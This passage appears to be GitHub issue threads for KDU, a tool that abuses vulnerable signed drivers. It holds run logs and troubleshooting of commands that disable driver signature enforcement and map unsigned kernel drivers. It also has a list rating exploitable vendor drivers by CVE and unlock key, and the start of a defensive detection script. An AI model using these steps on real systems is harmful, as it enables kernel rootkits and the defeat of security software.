>                 BpbDisabledSystemPolicy FALSE
>                 BpbDisabledNoHardwareSupport FALSE
>                 SpecCtrlEnumerated TRUE
>                 SpecCmdEnumerated TRUE
>                 IbrsPresent TRUE
>                 StibpPresent TRUE
>                 SmepPresent TRUE
>                 SpeculativeStoreBypassDisableAvailable TRUE
>                 SpeculativeStoreBypassDisableSupported TRUE
>                 SpeculativeStoreBypassDisabledSystemWide FALSE
>                 SpeculativeStoreBypassDisabledKernel FALSE
>                 SpeculativeStoreBypassDisableRequired TRUE
>                 BpbDisabledKernelToUser FALSE
>                 SpecCtrlRetpolineEnabled TRUE
>                 SpecCtrlImportOptimizationEnabled TRUE
>                 EnhancedIbrs FALSE
>                 HvL1tfStatusAvailable FALSE
>                 HvL1tfProcessorNotAffected FALSE
>                 HvL1tfMigitationEnabled FALSE
>                 HvL1tfMigitationNotEnabled_Hardware FALSE
>                 HvL1tfMigitationNotEnabled_LoadOption FALSE
>                 HvL1tfMigitationNotEnabled_CoreScheduler FALSE
>                 EnhancedIbrsReported TRUE
>                 MdsHardwareProtected FALSE
>                 MbClearEnabled FALSE
>                 MbClearReported TRUE
>                 TsxCtrlStatus 3
>                 TsxCtrlReported TRUE
>                 TaaHardwareImmune TRUE
>         >> SystemSpeculationControlInformation v2
>                 SbdrSsdpHardwareProtected FALSE
>                 FbsdpHardwareProtected FALSE
>                 PsdpHardwareProtected FALSE
>                 FbClearEnabled FALSE
>                 FbClearReported TRUE
> > List of loaded drivers
>         186 FFFFF80126EE0000 118784 \SystemRoot\system32\drivers\rspndr.sys
>         187 FFFFF80126F00000 126976 \SystemRoot\System32\DRIVERS\wanarp.sys
>         188 FFFFF80126F20000 757760 \SystemRoot\system32\DRIVERS\nwifi.sys
>         189 FFFFF80126FE0000 102400 \SystemRoot\system32\drivers\ndisuio.sys
>         190 FFFFF80127000000 110592 \SystemRoot\System32\drivers\mpsdrv.sys
>         191 FFFFF80127020000 90112 \SystemRoot\system32\drivers\mmcss.sys
>         192 FFFFF80127040000 53248 \??\C:\Windows\system32\AMDRyzenMasterDriver.sys
>         193 FFFFF80127050000 372736 \SystemRoot\System32\DRIVERS\srvnet.sys
>         194 FFFFF80123300000 856064 \SystemRoot\system32\drivers\peauth.sys
>         195 FFFFF801574B0000 872448 \SystemRoot\System32\DRIVERS\srv2.sys
>         196 FFFFF80157590000 77824 \SystemRoot\System32\drivers\condrv.sys
>         197 FFFFF801575B0000 266240 \SystemRoot\System32\Drivers\klupd_klif_mark.sys
>         198 FFFFF80156600000 6111232 \??\C:\Users\hiper\OneDrive\Masa³st³\KDmapper\NalDrv.sys
>         199 FFFFF80156BE0000 1777664 \SystemRoot\system32\drivers\HTTP.sys
>         200 FFFFF80156DA0000 352256 \SystemRoot\System32\Drivers\klupd_klif_klark.sys
> > List of device and driver objects in the common locations
>         \ -> clfs
>         \ -> FatCdrom
>         \ -> Fat
>         \ -> Ntfs
>         \Device -> 0000006a
>         \Device -> 00000058
>         \Device -> GPIO_1
>         \Device -> 00000044
>         \Device -> NTPNP_PCI0030
>         \Device -> NTPNP_PCI0002
>         \Device -> 00000030
>         \Device -> Nal
>         \Device -> 00000068
>         \Device -> USBPDO-9
>         \Device -> 00000054
>         \Device -> GPIO_2
>         \Device -> AmdLog
>         \Device -> KLIM6_DUMMYklim6
>         \Device -> NTPNP_PCI0031
>         \Device -> NTPNP_PCI0003
>         \Device -> 00000064
>         \Device -> USBPDO-5
>         \Device -> 00000050
>         \Device -> MSGpioClassExt0
>         \Device -> NTPNP_PCI0032
>         \Device -> NTPNP_PCI0004
>         \Device -> MSSGRMAGENTSYS
>         \Device -> 0000000f
>         \Device -> MMCSS
>         \Device -> lltdio
>         \Device -> 00000074
>         \Device -> 00000060
>         \Device -> USBPDO-1
>         \Device -> Bam
>         \Device -> Psched
>         \Device -> Tcp6
>         \Device -> NTPNP_PCI0033
>         \Device -> NTPNP_PCI0005
>         \Device -> 0000001f
>         \Device -> 0000000b
>         \Device -> Ndisuio
>         \Device -> 00000070
>         \Device -> FakeVid10
>         \Device -> RaidPort0
>         \Device -> NTPNP_PCI0034
>         \Device -> NTPNP_PCI0006
>         \Device -> 0000002f
>         \Device -> 0000001b
>         \Device -> 00000009
>         \Device -> SrvAdmin
>         \Device -> FakeVid11
>         \Device -> FakeVid8
>         \Device -> KlDiskCtl
>         \Device -> RaidPort1
>         \Device -> 0000003f
>         \Device -> NTPNP_PCI0035
>         \Device -> NTPNP_PCI0007
>         \Device -> 0000002b
>         \Device -> 00000019
>         \Device -> 00000005
>         \Device -> FakeVid12
>         \Device -> FakeVid4
>         \Device -> 0000004f
>         \Device -> ahcache
>         \Device -> NTPNP_PCI0036
>         \Device -> 0000003b
>         \Device -> NTPNP_PCI0008
>         \Device -> 00000029
>         \Device -> 00000015
>         \Device -> 00000001
>         \Device -> FakeVid13
>         \Device -> FakeVid0
>         \Device -> 0000005f
>         \Device -> _HID00000001
>         \Device -> 0000004b
>         \Device -> IPSECDOSP
>         \Device -> NTPNP_PCI0037
>         \Device -> 00000039
>         \Device -> NTPNP_PCI0009
>         \Device -> 00000025
>         \Device -> 00000011
>         \Device -> klnkd_061303_KLIF
>         \Device -> PEAuth
>         \Device -> FakeVid14
>         \Device -> 0000005b
>         \Device -> 00000049
>         \Device -> NTPNP_PCI0038
>         \Device -> 00000035
>         \Device -> 00000021
>         \Device -> WMIDataDevice
>         \Device -> MPS
>         \Device -> FakeVid15
>         \Device -> 0000006b
>         \Device -> 00000059
>         \Device -> 00000045
>         \Device -> Spaceport
>         \Device -> NTPNP_PCI0039
>         \Device -> 00000031
>         \Device -> LanmanDatagramReceiver
>         \Device -> 00000069
>         \Device -> 00000055
>         \Device -> vwififlt
>         \Device -> WFPL2DPConfig
>         \Device -> ConDrv
>         \Device -> RdpDrPort
>         \Device -> UMDFCtrlDev-38762bd4-7e0f-11ed-8c4e-806e6f6e6963
>         \Device -> 00000065
>         \Device -> USBPDO-6
>         \Device -> 00000051
>         \Device -> Tcp
>         \Device -> DxgKrnl
>         \Device -> NTPNP_PCI0010
>         \Device -> 00000075
>         \Device -> 00000061
>         \Device -> RealTekCard{C71C7B73-2EA3-4E74-A704-ECD4A71B8E26}
>         \Device -> USBPDO-2
>         \Device -> USBFDO-0
>         \Device -> Null
>         \Device -> NTPNP_PCI0011
>         \Device -> 0000000c
>         \Device -> WANARP
>         \Device -> 00000071
>         \Device -> Udp6
>         \Device -> NamedPipe
>         \Device -> NTPNP_PCI0012
>         \Device -> 0000001c
>         \Device -> LLDPCTRL
>         \Device -> RdpDrDvMgr
>         \Device -> FakeVid9
>         \Device -> Video0
>         \Device -> Kneps
>         \Device -> NTPNP_PCI0013
>         \Device -> 0000002c
>         \Device -> 00000006
>         \Device -> FakeVid5
>         \Device -> Video1
>         \Device -> NXTIPSEC
>         \Device -> KsecDD
>         \Device -> 0000003c
>         \Device -> NTPNP_PCI0014
>         \Device -> 00000016
>         \Device -> 00000002
>         \Device -> DeviceApi
>         \Device -> FakeVid1
>         \Device -> Video2
>         \Device -> _HID00000002
>         \Device -> 0000004c
>         \Device -> WFPL2
>         \Device -> MountPointManager
>         \Device -> NTPNP_PCI0015
>         \Device -> 00000026
>         \Device -> CNG
>         \Device -> 00000012
>         \Device -> SrvNet
>         \Device -> Video3
>         \Device -> 0000005c
>         \Device -> lwm
>         \Device -> 00000036
>         \Device -> NTPNP_PCI0016
>         \Device -> 00000022
>         \Device -> KMDF0
>         \Device -> 0000006c
>         \Device -> Video4
>         \Device -> HidHide
>         \Device -> 00000046
>         \Device -> NTPNP_PCI0017
>         \Device -> 00000032
>         \Device -> Video5
>         \Device -> 00000056
>         \Device -> KLWTP_DUMMY
>         \Device -> 00000042
>         \Device -> NTPNP_PCI0018
>         \Device -> UMDFCtrlDev-38762bd0-7e0f-11ed-8c4e-806e6f6e6963
>         \Device -> Video6
>         \Device -> 00000066
>         \Device -> USBPDO-7
>         \Device -> 00000052
>         \Device -> netadaptercx0
>         \Device -> WFP
>         \Device -> NTPNP_PCI0019
>         \Device -> 00000076
>         \Device -> Video7
>         \Device -> 00000062
>         \Device -> USBPDO-3
>         \Device -> USBFDO-1
>         \Device -> amdpsp
>         \Device -> 0000000d
>         \Device -> WwanProt
>         \Device -> 00000072
>         \Device -> DrDynVc
>         \Device -> Mailslot
>         \Device -> HarddiskVolume1
>         \Device -> RawCdRom
>         \Device -> 0000001d
>         \Device -> WANARPV6
>         \Device -> kneps_DUMMY
>         \Device -> RawIp6
>         \Device -> RawIp
>         \Device -> Tdx
>         \Device -> HarddiskVolumeShadowCopy1
>         \Device -> HarddiskVolume2
>         \Device -> VolMgrControl
>         \Device -> 0000002d
>         \Device -> 00000007
>         \Device -> FakeVid6
>         \Device -> PointerClass0
>         \Device -> Nsi
>         \Device -> FsWrap
>         \Device -> HarddiskVolume3
>         \Device -> Mup
>         \Device -> kl_cm.{EE198DD8-F4ED-4799-A748-5A130DE3050E}
>         \Device -> 0000003d
>         \Device -> NTPNP_PCI0020
>         \Device -> WindowsTrustedRT
>         \Device -> 00000017
>         \Device -> 00000003
>         \Device -> FakeVid2
>         \Device -> PointerClass1
>         \Device -> _HID00000003
>         \Device -> 0000004d
>         \Device -> Udp
>         \Device -> HarddiskVolume4
>         \Device -> RawTape
>         \Device -> NTPNP_PCI0021
>         \Device -> 00000027
>         \Device -> 00000013
>         \Device -> klark_041403_KLIF
>         \Device -> Bfs
>         \Device -> 0000005d
>         \Device -> RdpBus
>         \Device -> KLWTP
>         \Device -> HarddiskVolume5
>         \Device -> 00000037
>         \Device -> NTPNP_PCI0022
>         \Device -> 00000023
>         \Device -> 0000006d
>         \Device -> 00000047
>         \Device -> HarddiskVolume6
>         \Device -> NTPNP_PCI0023
>         \Device -> 00000033
>         \Device -> rspndr
>         \Device -> UMDFCtrlDev-38762bfc-7e0f-11ed-8c4e-c5ba839355fb
>         \Device -> UMDFCtrlDev-38762bf3-7e0f-11ed-8c4e-c5ba839355fb
>         \Device -> 00000057
>         \Device -> NetBt_Wins_Export
>         \Device -> 00000043
>         \Device -> HarddiskVolume7
>         \Device -> FileInfo
>         \Device -> NTPNP_PCI0024
>         \Device -> 00000067
>         \Device -> HarddiskVolume8
>         \Device -> USBPDO-8
>         \Device -> 00000053
>         \Device -> klbg_111403_KLIF
>         \Device -> arkmon_021304_KLIF
>         \Device -> NTPNP_PCI0025
>         \Device -> RESOURCE_HUB
>         \Device -> 00000063
>         \Device -> HarddiskVolume9
>         \Device -> KeyboardClass0
>         \Device -> USBPDO-4
>         \Device -> KLIM6klim6
>         \Device -> WfpAle
>         \Device -> Ndis
>         \Device -> NTPNP_PCI0026
>         \Device -> 0000000e
>         \Device -> 00000073
>         \Device -> KeyboardClass1
>         \Device -> USBPDO-0
>         \Device -> DfsClient
>         \Device -> PartmgrControl
>         \Device -> PcwDrv
>         \Device -> NTPNP_PCI0027
>         \Device -> 0000001e
>         \Device -> 0000000a
>         \Device -> KeyboardClass2
>         \Device -> UCX0
>         \Device -> KLWFP_DUMMY
>         \Device -> RdyBoost
>         \Device -> NTPNP_PCI0028
>         \Device -> PciControl
>         \Device -> 0000002e
>         \Device -> 0000001a
>         \Device -> 00000008
>         \Device -> Srv2
>         \Device -> AMDRyzenMasterDriverV19
>         \Device -> FakeVid7
>         \Device -> KeyboardClass3
>         \Device -> Netbios
>         \Device -> Beep
>         \Device -> eQoS
>         \Device -> 0000003e
>         \Device -> RawDisk
>         \Device -> NTPNP_PCI0029
>         \Device -> 0000002a
>         \Device -> 00000018
>         \Device -> 00000004
>         \Device -> FakeVid3
>         \Device -> KeyboardClass4
>         \Device -> _HID00000004
>         \Device -> 0000004e
>         \Device -> NetBT_Tcpip_{C71C7B73-2EA3-4E74-A704-ECD4A71B8E26}
>         \Device -> VRegDriver
>         \Device -> Afd
>         \Device -> 0000003a
>         \Device -> 00000028
>         \Device -> 00000014
>         \Device -> KeyboardClass5
>         \Device -> 0000005e
>         \Device -> _HID00000000
>         \Device -> AWCCDevice
>         \Device -> 0000004a
>         \Device -> NameResTrk
>         \Device -> BitLocker
>         \Device -> 00000038
>         \Device -> NTPNP_PCI0000
>         \Device -> 00000024
>         \Device -> 00000010
>         \Device -> 0000006e
>         \Device -> 0000005a
>         \Device -> 00000048
>         \Device -> 00000034
>         \Device -> NTPNP_PCI0001
>         \Device -> 00000020
>         \Driver -> klkbdflt
>         \Driver -> amdgpio2
>         \Driver -> fvevol
>         \Driver -> vdrvroot
>         \Driver -> NetBT
>         \Driver -> acpiex
>         \Driver -> Wdf01000
>         \Driver -> mpsdrv
>         \Driver -> storahci
>         \Driver -> MMCSS
>         \Driver -> lltdio
>         \Driver -> bam
>         \Driver -> Psched
>         \Driver -> BasicRender
>         \Driver -> disk
>         \Driver -> HTTP
>         \Driver -> NalDrv
>         \Driver -> Ndisuio
>         \Driver -> stornvme
>         \Driver -> klupd_klif_arkmon
>         \Driver -> WscVReg
>         \Driver -> monitor
>         \Driver -> ahcache
>         \Driver -> iorate
>         \Driver -> pcw
>         \Driver -> klupd_klif_klark
>         \Driver -> AmdPPM
>         \Driver -> rt25cx21
>         \Driver -> Ucx01000
>         \Driver -> USBXHCI
>         \Driver -> partmgr
>         \Driver -> PEAUTH
>         \Driver -> MsLldp
>         \Driver -> klmouflt
>         \Driver -> AWCCDriver
>         \Driver -> Vid
>         \Driver -> klim6
>         \Driver -> ACPI_HAL
>         \Driver -> amdgpio3
>         \Driver -> spaceport
>         \Driver -> USBSTOR
>         \Driver -> HidUsb
>         \Driver -> vwififlt
>         \Driver -> condrv
>         \Driver -> DXGKrnl
>         \Driver -> PnpManager
>         \Driver -> RDPDR
>         \Driver -> Null
>         \Driver -> intelpep
>         \Driver -> PRM
>         \Driver -> wanarp
>         \Driver -> SoftwareDevice
>         \Driver -> kneps
>         \Driver -> klflt
>         \Driver -> CLFS
>         \Driver -> WindowsTrustedRTProxy
>         \Driver -> AMDXE
>         \Driver -> NdisCap
>         \Driver -> KSecDD
>         \Driver -> volmgr
>         \Driver -> DeviceApi
>         \Driver -> umbus
>         \Driver -> klpnpflt
>         \Driver -> klbackupdisk
>         \Driver -> CNG
>         \Driver -> Win32k
>         \Driver -> amdfendrmgr
>         \Driver -> npsvctrig
>         \Driver -> volume
>         \Driver -> KSecPkg
>         \Driver -> TPM
>         \Driver -> mouclass
>         \Driver -> HidHide
>         \Driver -> NativeWifiP
>         \Driver -> msisadrv
>         \Driver -> IntelPMT
>         \Driver -> kbdclass
>         \Driver -> dtliteusbbus
>         \Driver -> AMDPCIDev
>         \Driver -> mouhid
>         \Driver -> dtlitescsibus
>         \Driver -> AMDSAFD
>         \Driver -> volsnap
>         \Driver -> amdpsp
>         \Driver -> GPIOClx0101
>         \Driver -> nsiproxy
>         \Driver -> WMIxWDM
>         \Driver -> MsQuic
>         \Driver -> tdx
>         \Driver -> WindowsTrustedRT
>         \Driver -> HDAudBus
>         \Driver -> BasicDisplay
>         \Driver -> rdpbus
>         \Driver -> klwtp
>         \Driver -> klhk
>         \Driver -> kbdhid
>         \Driver -> AtiHDAudioService
>         \Driver -> UEFI
>         \Driver -> pdc
>         \Driver -> rspndr
>         \Driver -> WpdUpFltr
>         \Driver -> WmiAcpi
>         \Driver -> klupd_klif_klbg
>         \Driver -> HdAudAddService
>         \Driver -> NetAdapterCx
>         \Driver -> mssmbios
>         \Driver -> klwfp
>         \Driver -> volmgrx
>         \Driver -> pci
>         \Driver -> NdisVirtualBus
>         \Driver -> kdnic
>         \Driver -> cdrom
>         \Driver -> NDIS
>         \Driver -> cm_km
>         \Driver -> swenum
>         \Driver -> amdfendr
>         \Driver -> klids
>         \Driver -> rdyboost
>         \Driver -> WFPLWFS
>         \Driver -> Tcpip
>         \Driver -> SgrmAgent
>         \Driver -> klupd_klif_mark
>         \Driver -> AMDRyzenMasterDriverV19
>         \Driver -> USBHUB3
>         \Driver -> Beep
>         \Driver -> kldisk
>         \Driver -> usbccgp
>         \Driver -> amdwddmg
>         \Driver -> AFD
>         \Driver -> mountmgr
>         \Driver -> ksthunk
>         \Driver -> ViGEmBus
>         \Driver -> afunix
>         \Driver -> WudfRd
>         \Driver -> CompositeBus
>         \Driver -> EhStorClass
>         \Driver -> ACPI
> > Process (self) handle trace
>         >> 0xFFFFF80114ACCFD7, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0xFFFFF80114ACD423, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0xFFFFF8011483D4E8, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0x00007FF8B60EF2C4, ntdll.dll, base 0x00007FF8B6050000
>         >> 0x00007FF63FC0F928, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0FD5C, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0FFEB, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC09F3D, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0A829, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0AA0E, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC10820, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF8B44C26BD, KERNEL32.DLL, base 0x00007FF8B44B0000
>         >> 0x00007FF8B60ADFB8, ntdll.dll, base 0x00007FF8B6050000
> > Thread handle trace
>         >> 0xFFFFF80114BB1522, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0xFFFFF80114BB1303, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0xFFFFF8011483D4E8, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0x00007FF8B60F14D4, ntdll.dll, base 0x00007FF8B6050000
>         >> 0x00007FF63FC0F997, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0FD5C, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0FFEB, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC09F3D, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0A829, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0AA0E, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC10820, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF8B44C26BD, KERNEL32.DLL, base 0x00007FF8B44B0000
>         >> 0x00007FF8B60ADFB8, ntdll.dll, base 0x00007FF8B6050000
> > Process (1188) handle trace
> Cannot open process, NTSTATUS (0xC0000022)
> > Section handle trace
>         >> 0xFFFFF80114ACF260, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0xFFFFF80114ACF3CC, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0xFFFFF8011483D4E8, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0x00007FF8B60EF744, ntdll.dll, base 0x00007FF8B6050000
>         >> 0x00007FF63FC0FABB, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0FE06, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0FFEB, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC09F3D, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0A829, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0AA0E, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC10820, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF8B44C26BD, KERNEL32.DLL, base 0x00007FF8B44B0000
>         >> 0x00007FF8B60ADFB8, ntdll.dll, base 0x00007FF8B6050000
> > Analyzing process working set
>         >> ThreadId [10820] Pc 00007FF8B60EF184 (ntdll.dll) : Va 00007FF8B60EF185 (ntdll.dll)
>         >> ThreadId [10820] Pc 00007FF8B60EF184 (ntdll.dll) : Va 000000000014CE09 (Unknown)
>         >> ThreadId [10820] Pc 00007FF63FC0F4AF (kdu.exe) : Va 00007FF63FC0F4AF (kdu.exe)
>         >> ThreadId [10820] Pc 00007FF63FC0F4C2 (kdu.exe) : Va 000000000014CE31 (Unknown)
>         >> ThreadId [10820] Pc 00007FF63FC0F4D3 (kdu.exe) : Va 00007FF63FC2A609 (kdu.exe)
>         >> ThreadId [10820] Pc 00007FF8B60EF118 (ntdll.dll) : Va 000000007FFE0309 (Unknown)
> > List of registered minifilters
>         >> bindflt
>         >> WdFilter
>         >> KLIF
>         >> storqosflt
>         >> wcifs
>         >> CldFlt
>         >> bfs
>         >> FileCrypt
>         >> luafv
>         >> klbackupflt
>         >> npsvctrig
>         >> Wof
>         >> FileInfo
> > Physical memory layout
> ResourceList Count 1
> pDesc[0].PartialResourceList.Count 7
> #0 Flags 0x0000 0x0000000000001000::0x00000000000A0000 (length 0x000000000009F000, 0 Mb)
> #1 Flags 0x0000 0x0000000000100000::0x0000000009E02000 (length 0x0000000009D02000, 157 Mb)
> #2 Flags 0x0000 0x000000000A000000::0x000000000A200000 (length 0x0000000000200000, 2 Mb)
> #3 Flags 0x0000 0x000000000A20E000::0x000000000B000000 (length 0x0000000000DF2000, 13 Mb)
> #4 Flags 0x0000 0x000000000B020000::0x00000000CB147000 (length 0x00000000C0127000, 3073 Mb)
> #5 Flags 0x0000 0x00000000CDBFF000::0x00000000CF000000 (length 0x0000000001401000, 20 Mb)
> #6 Flags 0x0200 0x0000000100000000::0x000000042F380000 (length 0x000000032F380000, 13043 Mb)
> [+] Return value: 1. Bye-bye!

BSOD

After using -dse 6 and -map Driver.sys my PC would BSOD after a while (sometimes very soon, sometimes after a bit) with the error CRITICAL_STRUCTURE_CORRUPTION on CI.dll.

Any idea for a fix? I see that CI.dll is loaded by KDU, so I'm guessing that's where the issue originated from.

minidump file below

082323-9531-01.zip

[!] Could not load drivers database, GetLastError 2

I get this error when trying to load a dummy driver. I looked it up and it says that I'm missing one or more DLL files. I imagine it has something to do with building the DLLs in the main source file, but I don't know where to put the DLL files.

List of checked providers

Below is the list of drivers checked during KDU development which, for some reason(s), did not get the opportunity to get into it.

  1. AMI amifldrv64.sys - from a BIOS flashing tool, based on MAPMEM. Disadvantage: driver is very old.

  2. ASUS AsIO3.sys - from the infamous EneTech dev who loves to copy-paste from Google.
    Driver locked; unlocking repo for reference: https://github.com/hfiref0x/AsIo3Unlock. Disadvantage is the requirement to use the AsusCertService application as a zombie proxy for registering AsIO3 as a "trusted" application. Besides, it is still the same WINIO, just WHQL signed in Dec 2020.

  3. ATI atillk64.sys - respective CVE ids: CVE-2019-7246, CVE-2020-12138. Disadvantages are: driver is very old and provides access to physical memory through MmMapIoSpace, which limits its use.

  4. DELL PC Doctor pcdsrvc_x64.sys - Driver locked; unlocking requires sending an IOCTL with a specific value as "key" 0xA1B2C3D4. Disadvantage is MmMapIoSpace.

  5. GPU-Z gpu-z.sys driver - respective CVE id: CVE-2019-7245. Disadvantage is MmMapIoSpace.

  6. miHoYo mhyprot2.sys driver - anti-cheat driver from Chinese game company. Itself a wormhole with functionality to read/write to the virtual memory of arbitrary processes and read arbitrary kernel memory. Driver is locked, unlocking code is available. Disadvantages: does not provide write access to kernel/physical memory, extensive size (>1 Mb).

  7. Razer Synapse rzpnk.sys driver - respective CVE id: CVE-2017-14398. Despite having amazing features on board, this driver doesn't allow physical memory access beyond 4Gb as it truncates addresses above that. In general it is unusable for main KDU tasks.

  8. Supermicro superbmc.sys driver - based on MAPMEM. Disadvantage: this driver has an initialization bug which results in a BSOD on its load under certain conditions.

  9. VirtualBox vboxdrv.sys from a Chinese APT, which is different from the original Turla group driver. While they utilize the same unpatched exploit of VBox 1.6-2.x, it uses a different driver and the original exploit code needs a little tweak to work with it. Disadvantages: driver is old; from the 1.6 experience it is known that vboxdrv is exclusively bugged; implementing this will require a lot of additional code as it needs a different approach for code execution.

  10. Some AMI BIOS flashing drivers based on WINIO; unfortunately they expect the bus address to be 32 bits long.

  11. Lalla NVME Pin driver - device driver from the NVMECraft bundle. Contains an MmMapIoSpace arbitrary read/write primitive; however, due to a driver bug its abuse is way too complicated.

  12. Getac gtckmdfbs driver. Contains a full set of wormhole features; however, the physical memory address is limited to the ULONG limit.

and dozens of I/O drivers based on WINIO and WinRing0 from various HW vendors.

Critical Structure Corruption BSOD

I have some questions:

  1. Do I need to run '-dse 0' after using '-dse 6'?
  2. Does the CRITICAL_STRUCTURE_CORRUPTION BSOD have to do with KDU?
  3. Do I have to do anything after using KDU, like revert back something?

I don't know how or why my PC just gets a BSOD sometimes, even after I restarted my PC; it happens after I use '-dse 6' and '-map driver.sys' on KDU.

Could not query DSE state, GetLastError 5

I am using Windows 10 with the latest version 21H1 build 19044.1826
I have tried disabling Secure Boot and disabling Memory Integrity from Windows Defender, but when I run the command kdu -dse ANYTHING, I get this output:

[#] Kernel Driver Utility v1.2.0 (build 2202) started, (c)2020 - 2022 KDU Project
[#] Build at Thu Feb 17 01:33:48 2022, header checksum 0x4D588
[#] Supported x64 OS : Windows 7 and above
[*] Windows version: 10.0 build 19044
[*] SecureBoot is disabled on this machine
[+] Provider: "CVE-2015-2291", Name "NalDrv"
[+] Drivers database "drv64.dll" loaded at 0x0000019058F80002
[+] Extracting vulnerable driver as "C:\Users\user\Desktop\NalDrv.sys"
[+] Vulnerable driver "NalDrv" loaded
[+] Vulnerable driver "NalDrv" opened
[+] Executing post-open callback for given provider
[+] Driver device security descriptor set successfully
[+] Module "CI.dll" loaded for pattern search
[!] Could not query DSE state, GetLastError 5
[!] Unable to unload vulnerable driver, NTSTATUS (0xC0000010)
[+] Return value: 0. Bye-bye!

a question please

Hello friends,
and thank you for your hard work.

I have a question, please.
I compiled a driver using examples from this repo.
I want to use ZwProtectVirtualMemory,
but as described only ntoskrnl symbols were resolved.

So I tried to find its address and use it directly
using MmGetSystemRoutineAddress,
but I get a BSOD KMOD_UNHANDLED_EXCEPTION.
Shouldn't this code work? I only used ntoskrnl symbols to locate the function in the kernel and use it.

And if not,
is there any better way to solve it?
I want to change the protection of a user-mode process.
And __try/__except, are those not useful in a mapped driver?

Unable to load vulnerable driver

Unable to load vulnerable driver, NTSTATUS (0xC000009A)
Return value: 0

I get this error when I use "kdu -dse 6"

Any way to fix?

Insufficient system resources

Hi! I'm trying to run the utility with .\kdu.exe -map .\mydriver.sys in PowerShell as admin, and receive this log:

[#] Kernel Driver Utility v1.3.3 (build 2307) started, (c)2020 - 2023 KDU Project
[#] Built at Fri Sep  1 10:17:29 2023, header checksum 0x55823
[#] Supported x64 OS : Windows 7 and above
[*] CPU vendor string: AuthenticAMD
[*] Windows version: 10.0 build 22621
[*] SecureBoot is enabled on this machine
[*] WHQL enforcement ENABLED
[+] MSFT Driver block list is enabled
[*] Driver mapping using shellcode version: 1
[+] Input driver file ".\mydriver.sys" loaded at 0x00007FF99A420000
[+] MSFT hypervisor present
[+] Drivers database "drv64.dll" loaded at 0x00007FF96C700000
[+] Firmware type (FirmwareTypeUefi)
[+] Provider: "CVE-2015-2291", Name "NalDrv"
[+] Extracting vulnerable driver as "path\NalDrv.sys"
[!] Unable to load vulnerable driver, NTSTATUS (0xC000009A): Insufficient system resources exist to complete the API.
[+] Return value: 0. Bye-bye!

I've noticed other closed issues for the block list and enforcement, but I'm unsure this issue relates to them, since the error is about system resources. I have 16 Gb RAM in total, 8 Gb unused, so I doubt it's RAM. Is there any other troubleshooting I can do?
I tried running the system without driver signature checking using this tutorial (Disable driver signature enforcement), but it didn't help.

NalDrv seems to bug out

When trying to leverage KDU's 0 provider (NalDrv) I get the following error:

[#] Kernel Driver Utility v1.1.1 started, (c)2020 - 2021 KDU Project
[#] Build at Fri May 14 22:25:32 2021, header checksum 0x3E810
[#] Supported x64 OS : Windows 7 and above
[*] Windows version: 10.0 build 19043
[*] SecureBoot is disabled on this machine
[+] Selected provider: 0
[*] Driver mapping using shellcode version: 1
[+] Input driver file loaded at 0x00007FF605B60000
[+] Provider: CVE-2015-2291, Name "NalDrv"
[+] Drivers database "drv64.dll" loaded at 0x000001EB374E0002
[!] Vulnerable driver is already loaded
[+] Vulnerable driver opened
[+] Executing post-open callback for given provider
[+] Driver device security descriptor set successfully
[+] Victim driver map attempt 1 of 3
[+] Extracting victim driver "PROCEXP152" as "C:\Users\Jean\AppData\Local\Temp\PROCEXP152.sys"
[+] Victim driver loaded, handle 0x00000000000000EC
[+] Reading FILE_OBJECT at 0xFFFFC30ADBAA7260
[!] Could not read FILE_OBJECT at 0xFFFFC30ADBAA7260
[!] Error preloading victim driver, abort
[+] Victim driver unloaded
[!] Unable to unload vulnerable driver, NTSTATUS (0xC0000034)
[+] Return value: 0. Bye-bye!

When checking Sysmon, I do not see any new event ID 6 loads for NalDrv.
I do see a reg entry for NalDrv being created by KDU, but the reg entry does not specify a driver location.


Lastly, in the readme.md, provider 0 is labeled as IQVM64; I think this is a mistake?

Thanks
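A defender-side triage check for the kind of driver service entries described in the report above (a kernel-driver service created by the tool with no image location, or a driver extracted to a Temp or Desktop path as in the logs on this page), as an added example that is not part of KDU or of this issue thread. The watchlist names come from this page's logs; the function name, path hints and the "Type 1 = kernel driver" registry convention are assumptions of the example.

```powershell
# Added example (not KDU code): enumerate kernel-driver service entries from the
# registry and flag the ones worth a second look after a BYOVD-style tool has run.
# Watchlist names are taken from log lines on this page; everything else is assumed.

function Find-SuspiciousDriverServices {
    param(
        # Service names seen in this page's logs: the vulnerable provider and the victim driver.
        [string[]] $WatchList = @('NalDrv', 'PROCEXP152'),
        # Directory fragments where a vendor-installed, signed driver would not normally live.
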